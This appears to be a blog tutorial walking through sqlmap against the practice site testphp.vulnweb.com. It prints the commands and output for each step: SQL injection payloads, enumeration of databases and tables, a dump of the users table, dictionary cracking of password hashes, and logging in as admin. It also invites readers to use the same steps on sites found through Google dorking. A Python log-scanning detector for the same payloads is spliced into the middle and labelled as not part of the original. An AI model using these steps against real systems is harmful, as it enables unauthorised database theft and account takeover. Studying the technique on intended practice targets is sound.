Sqlmap Injection Practice
Sqlmap
SQLMap is an open-source tool used for penetration testing of web applications that are vulnerable to SQL injection. SQL injection is a class of attack in which the attacker tries to insert malicious SQL into the requests a web application sends to its database, which can result in unauthorized SQL being executed or sensitive data being leaked.
SQLMap works by automating the detection and exploitation of SQL injection vulnerabilities in web applications. The tool identifies such a vulnerability and then exploits it, which can give unauthorized access to the database or to sensitive information.
Some of SQLMap's main features are automated testing, detection of the vulnerability type, database extraction, retrieval of tables, columns and rows from the affected database, and even execution of system commands on the vulnerable host.
Pentesting practice against a website
In this article we will learn to pentest a website that is vulnerable to SQL injection. Open your Linux machine; Termux users can adapt the steps accordingly.
The site we will test is the vuln.php site, which is already vulnerable to SQL injection and was deliberately published for learning pentesting.
Open your Linux or Termux terminal.
$ sqlmap -h
___
__H__
___ ___[']_____ ___ ___ {1.7.2.8#dev}
|_ -| . [,] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
Usage: python sqlmap [options]
Options:
-h, --help Show basic help message and exit
-hh Show advanced help message and exit
--version Show program's version number and exit
-v VERBOSE Verbosity level: 0-6 (default 1)
Target:
At least one of these options has to be provided to define the
target(s)
-u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")
-g GOOGLEDORK Process Google dork results as target URLs
Request:
These options can be used to specify how to connect to the target URL
--data=DATA Data string to be sent through POST (e.g. "id=1")
--cookie=COOKIE HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--random-agent Use randomly selected HTTP User-Agent header value
--proxy=PROXY Use a proxy to connect to the target URL
--tor Use Tor anonymity network
--check-tor Check to see if Tor is used properly
Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts
-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to provided value
Detection:
These options can be used to customize the detection phase
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (1-3, default 1)
Techniques:
These options can be used to tweak testing of specific SQL injection
techniques
--technique=TECH.. SQL injection techniques to use (default "BEUSTQ")
Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables
-a, --all Retrieve everything
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--passwords Enumerate DBMS users password hashes
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table(s) to enumerate
-C COL DBMS database table column(s) to enumerate
Operating system access:
These options can be used to access the back-end database management
system underlying operating system
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an OOB shell, Meterpreter or VNC
General:
These options can be used to set some general working parameters
--batch Never ask for user input, use the default behavior
--flush-session Flush session files for current target
Miscellaneous:
These options do not fit into any other category
--wizard Simple wizard interface for beginner users
Type the command below
$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
Roughly the following information will appear
[*] starting @ 19:48:19 /2023-07-28/
[19:48:21] [INFO] resuming back-end DBMS 'mysql'
[19:48:26] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat=1 AND 5642=5642
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: cat=1 AND GTID_SUBSET(CONCAT(0x71766b7071,(SELECT (ELT(3515=3515,1))),0x7162767a71),3515)
Type: time-based blind
Title: MySQL > 5.0.12 OR time-based blind (heavy query - comment)
Payload: cat=1 OR 6938=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)#
Type: UNION query
Title: MySQL UNION query (NULL) - 11 columns
Payload: cat=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b7071,0x4f7065566b687a4f4c686b63774e426b594d4753484e4d616576645652634b55616973436a6d5550,0x7162767a71),NULL,NULL,NULL#
---
[19:48:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
[19:48:27] [INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema
[19:48:27] [INFO] fetched data logged to text files under '/home/ezaafebri/.local/share/sqlmap/output/testphp.vulnweb.com'
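The injection points sqlmap reported above are also exactly what this run leaves behind in the web server's access log, which is where a defender would look for it. As an added example (not part of the original article), here is a small Python detector that scans nginx combined-format log lines for the four techniques listed above and for sqlmap's default User-Agent (the one --random-agent replaces); the log lines are constructed for the example and assume the article's target path.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Regexes keyed to the four techniques sqlmap reported for the `cat` parameter above.
TECHNIQUES = [
    ("boolean-based blind", re.compile(r"\b(?:AND|OR)\s+\d+\s*=\s*\d+", re.I)),
    ("error-based", re.compile(r"\bGTID_SUBSET\s*\(|\bEXTRACTVALUE\s*\(|\bUPDATEXML\s*\(", re.I)),
    ("time-based blind", re.compile(
        r"\b(?:SLEEP|BENCHMARK)\s*\(|INFORMATION_SCHEMA\.COLUMNS\s+\w+\s*,\s*INFORMATION_SCHEMA\.COLUMNS", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
]
# nginx "combined" access-log format (the page reports Nginx in front of the target).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

def classify_request(target):
    """Return the technique names whose signature appears in any decoded query parameter."""
    found = []
    for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        for name, pattern in TECHNIQUES:
            if name not in found and pattern.search(value):
                found.append(name)
    return found

def scan_log(lines):
    """Return one alert per request that carries a payload or sqlmap's default User-Agent."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        techniques = classify_request(m["target"])
        sqlmap_ua = m["ua"].lower().startswith("sqlmap/")  # default UA unless --random-agent is used
        if techniques or sqlmap_ua:
            alerts.append({"ip": m["ip"], "ts": m["ts"], "techniques": techniques, "sqlmap_ua": sqlmap_ua})
    return alerts

# Constructed sample log: one normal visit, then the requests a run like the one above would leave.
UA = "sqlmap/1.7.2.8#dev (https://sqlmap.org)"
SAMPLE_LOG = [
    '198.51.100.7 - - [28/Jul/2023:19:40:02 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    f'203.0.113.5 - - [28/Jul/2023:19:48:26 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5120 "-" "{UA}"',
    f'203.0.113.5 - - [28/Jul/2023:19:48:27 +0000] "GET /listproducts.php?cat=1%20AND%205642%3D5642 HTTP/1.1" 200 5120 "-" "{UA}"',
    f'203.0.113.5 - - [28/Jul/2023:19:48:28 +0000] "GET /listproducts.php?cat=1%20AND%20GTID_SUBSET(CONCAT(0x71766b7071,(SELECT%20(ELT(3515%3D3515,1))),0x7162767a71),3515) HTTP/1.1" 200 1873 "-" "{UA}"',
    f'203.0.113.5 - - [28/Jul/2023:19:48:29 +0000] "GET /listproducts.php?cat=1%20OR%206938%3D(SELECT%20COUNT(*)%20FROM%20INFORMATION_SCHEMA.COLUMNS%20A,%20INFORMATION_SCHEMA.COLUMNS%20B,%20INFORMATION_SCHEMA.COLUMNS%20C%20WHERE%200%20XOR%201)%23 HTTP/1.1" 200 5120 "-" "{UA}"',
    f'203.0.113.5 - - [28/Jul/2023:19:48:41 +0000] "GET /listproducts.php?cat=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b7071,0x4f70,0x7162767a71),NULL,NULL,NULL%23 HTTP/1.1" 200 5300 "-" "{UA}"',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Note that the blind and time-based requests return the same status and size as a legitimate one, so the parameter value, not the response, is what gives them away in the log.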
We continue by typing this command (the database name is passed with -D, as shown in the help output above)
$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
The information will look roughly like this
Database: acuart
[8 tables]
+---------------------------------------+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
+---------------------------------------+

Database: information_schema
[79 tables]
+---------------------------------------+
| ADMINISTRABLE_ROLE_AUTHORIZATIONS |
| APPLICABLE_ROLES |
| CHARACTER_SETS |
| CHECK_CONSTRAINTS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMNS_EXTENSIONS |
| COLUMN_PRIVILEGES |
| COLUMN_STATISTICS |
| ENABLED_ROLES |
| ENGINES |
| EVENTS |
| FILES |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CACHED_INDEXES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_PER_INDEX |
| INNODB_CMP_PER_INDEX_RESET |
| INNODB_CMP_RESET |
| INNODB_COLUMNS |
| INNODB_DATAFILES |
| INNODB_FIELDS |
| INNODB_FOREIGN |
| INNODB_FOREIGN_COLS |
| INNODB_FT_BEING_DELETED |
| INNODB_FT_CONFIG |
| INNODB_FT_DEFAULT_STOPWORD |
| INNODB_FT_DELETED |
| INNODB_FT_INDEX_CACHE |
| INNODB_FT_INDEX_TABLE |
| INNODB_INDEXES |
| INNODB_METRICS |
| INNODB_SESSION_TEMP_TABLESPACES |
| INNODB_TABLES |
| INNODB_TABLESPACES |
| INNODB_TABLESPACES_BRIEF |
| INNODB_TABLESTATS |
| INNODB_TEMP_TABLE_INFO |
| INNODB_TRX |
| INNODB_VIRTUAL |
| KEYWORDS |
| KEY_COLUMN_USAGE |
| OPTIMIZER_TRACE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| RESOURCE_GROUPS |
| ROLE_COLUMN_GRANTS |
| ROLE_ROUTINE_GRANTS |
| ROLE_TABLE_GRANTS |
| ROUTINES |
| SCHEMATA |
| SCHEMATA_EXTENSIONS |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| ST_GEOMETRY_COLUMNS |
| ST_SPATIAL_REFERENCE_SYSTEMS |
| ST_UNITS_OF_MEASURE |
| TABLES |
| TABLESPACES |
| TABLESPACES_EXTENSIONS |
| TABLES_EXTENSIONS |
| TABLE_CONSTRAINTS |
| TABLE_CONSTRAINTS_EXTENSIONS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_ATTRIBUTES |
| USER_PRIVILEGES |
| VIEWS |
| VIEW_ROUTINE_USAGE |
| VIEW_TABLE_USAGE |
+---------------------------------------+
Now we will look for the username and password of the admin login.
If it is a target website of your own or one you found by Google dorking, you first have to find out where its admin login is located, using whatever tools you like.
We continue by typing the command below (the database is selected with -D and the table with -T, as in the help output above)
$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --dump
Look at the output of the command below
[19:55:40] [INFO] fetching columns for table 'users' in database 'acuart'
[19:55:40] [INFO] fetching entries for table 'users' in database 'acuart'
[19:55:40] [INFO] recognized possible password hashes in column 'cart'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[19:55:43] [INFO] writing hashes to a temporary file '/tmp/sqlmapap0algo922092/sqlmaphashes-1a_xt8je.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[19:55:46] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[19:55:47] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] n
[19:55:49] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[19:55:49] [INFO] starting 4 processes
[19:56:39] [WARNING] no clear password(s) found
Database: acuart
Table: users
Note: pay attention to the prompts I highlighted in orange and answer them with Y/N as shown.
Congratulations, you have found the username and password.
Table: users
[1 entry]
+-------------------------------------------+----------------------------------+-------------------------------------------+------+-------------------------------------------+-------------------------------------------+-------+-------------------------------------------+
| cc | cart | name | pass | email | phone | uname | address |
+-------------------------------------------+----------------------------------+-------------------------------------------+------+-------------------------------------------+-------------------------------------------+-------+-------------------------------------------+
| tx97btor4kub7wqdchwmsp28mbfh6yyvwx1xz0gq5 | f9b33abe25d5af4a12da38a378793006 | k1cefwsu8nyebzuggk0pws6bqejka12y005033kt9 | test | q5kqj4w2cv2mf7yoks4x00ajumnse96648987bo1d | y4afiuvsbl1cexxeji3nzq99tcmidz5w3y8y61nrc | test | iub98vlt1mrd4ynf9jtoprzajdcj30vxtzyzw2ds2 |
+-------------------------------------------+----------------------------------+-------------------------------------------+------+-------------------------------------------+-------------------------------------------+-------+-------------------------------------------+
[19:56:39] [INFO] table 'acuart.users' dumped to CSV file '/home/ezaafebri/.local/share/sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'
[19:56:39] [INFO] fetching columns for table 'guestbook' in database 'acuart'
[19:56:39] [INFO] fetching entries for table 'guestbook' in database 'acuart'
[19:56:39] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[19:56:47] [INFO] fetching number of entries for table 'guestbook' in database 'acuart'
[19:56:47] [INFO] resumed: 0
[19:56:47] [WARNING] table 'guestbook' in database 'acuart' appears to be empty
Note: Username: test and password: test
Go ahead and log in; you are now in the admin dashboard.
That is roughly how it is done. Please do not misuse this material.
Disclaimer: As the founder, I take no responsibility if the material I share in this article is misused. All articles are for educational purposes only, not for illegal activities.